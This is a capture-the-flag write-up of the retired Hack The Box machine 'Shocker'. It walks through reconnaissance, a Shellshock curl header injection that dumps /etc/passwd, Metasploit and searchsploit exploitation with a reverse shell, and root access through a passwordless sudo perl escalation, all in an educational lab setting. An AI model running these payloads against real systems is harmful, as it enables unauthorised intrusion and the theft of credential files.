Hack the Box Shocker
My write-up on HTB’s retired machine “Shocker” that outlines Metasploit usage and manual exploitation.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
First, let’s use the nmapAutomator to automate the process of recon/enumeration.
Summary of our nmap scan results:
Nmap scan report for 10.10.10.56
Host is up (0.087s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
|_ CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I’ve tried different nmap scans just to ensure that I did not miss any port but still resulted to port tcp/80 and tcp/2222
Enumeration
I started browsing http://10.10.10.56 to see if I could find more information
So far, nothing stands out…
Next step is to proceed on using dirbuster and start scanning wide to identify any folders or files
Started going through the directories that were identified by dirbuster and found a file that can lead us to get more information “http://10.10.10.56/cgi-bin/user.sh”
curl -v http://10.10.10.56/cgi-bin/user.sh* Trying 10.10.10.56:80...
* TCP_NODELAY set
* Connected to 10.10.10.56 (10.10.10.56) port 80 (#0)
> GET /cgi-bin/user.sh HTTP/1.1
> Host: 10.10.10.56
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Wed, 18 Mar 2020 19:39:49 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Transfer-Encoding: chunked
< Content-Type: text/x-sh
<
Content-Type: text/plainJust an uptime test script15:39:49 up 1:30, 0 users, load average: 0.00, 0.00, 0.00* Connection #0 to host 10.10.10.56 left intact
Taking our bash command bit further …
root@Bugok:/home/arcy24/Documents/tools/nmapAutomator/10.10.10.56# curl -v http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
* Trying 10.10.10.56:80...
* TCP_NODELAY set
* Connected to 10.10.10.56 (10.10.10.56) port 80 (#0)
> GET /cgi-bin/user.sh HTTP/1.1
> Host: 10.10.10.56
> User-Agent: curl/7.68.0
> Accept: */*
> custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Wed, 18 Mar 2020 19:49:13 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash
* Connection #0 to host 10.10.10.56 left intactNow that we know that Shellshock vulnerability is present in the host, next step is to exploit the host using Metasploit.
Exploitation
Initial Foothold
Metasploit
msfdb start
[+] Starting databasemsfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|=[ metasploit v5.0.79-dev ]
+ -- --=[ 1979 exploits - 1088 auxiliary - 339 post ]
+ -- --=[ 563 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]msf5 >
After loading ‘msfconsole’, next step is to search for shellshock
msf5 > search shellshockMatching Modules
================# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
1 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
2 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
3 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
4 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
5 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
6 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
9 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
10 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
11 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)msf5 >
The closest module is #5 which is ‘exploit/multi/http/apache_mod_cgi_bash_env_exec’ Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > optionsModule options (exploit/multi/http/apache_mod_cgi_bash_env_exec):Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual hostExploit target:Id Name
-- ----
0 Linux x86msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) >
Set RHOST and TARGETURI the rest can be left as is.
Set payload
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
I did have some issues running the exploit, MS keeps on giving me error about RPATH but I re-set the path using the same path ‘/bin’ and it started working.
Last step is to run the exploit
User flag obtained
iduid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)pwd
/usr/lib/cgi-bin
cd /home
ls
shelly
cd shelly
ls
user.txt
Non-Metasploit Way
Search for ‘apache cgi’ exploits
Since we were successful using the Metasploit module ‘exploit/multi/http/apache_mod_cgi_bash_env_exec’ the closest one from our searchsploit query is the ‘Apache mod_cgi — ‘Shellshock’ Remote Command Injection’
I did not have to edit the python exploit and executed as is. User account ‘Shelly’ obtained
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Privilege Escalation
Great tool for determining privilege escalation is LinEnum. This script automates what you would normally perform manually checking for privilege access, user information, system information, services, etc.
Transferring LinEnum
We have to find a way to copy our LinEnum.sh from my system to ‘Shocker’ host.
First step is to load python http server from the attacker host on another terminal
Second step is to do a wget from the victim machine (Shocker) and download the LinEnum.sh from the attacker host (Kali)
Once the transfer is completed, execute LinEnum.sh
LinEnum Results
Since LinEnum result is quite large, I will only include the results that gave me root access. Upon reviewing the logs, line ‘It looks like we have some admin users’ caught my attention.
Executing command ‘sudo -l’ tells use that user shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Next step is to run command sudo perl -e ‘exec “/bin/bash”;’ and we were able to obtain root
[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)'shelly' account has admin priv??[+] We can sudo without supplying a password!
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
[+] Possible sudo pwnage!
/usr/bin/perl
[-] Accounts that have recently used sudo:
/home/shelly/.sudo_as_admin_successful**********
Executed sudo -l so we can confirm that executing 'perl' does not require any password and we can run as root. sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl**********sudo perl -e 'exec "/bin/bash";'
id
uid=0(root) gid=0(root) groups=0(root)We have root!!!!cd /root
ls
root.txt
Lessons Learned
- Further understanding working with Curl + Bash commands.
- Huge difference using Metasploit vs exploiting manually but ‘we have to try harder’.
- As always, keep your systems up-to-date on patches.
References
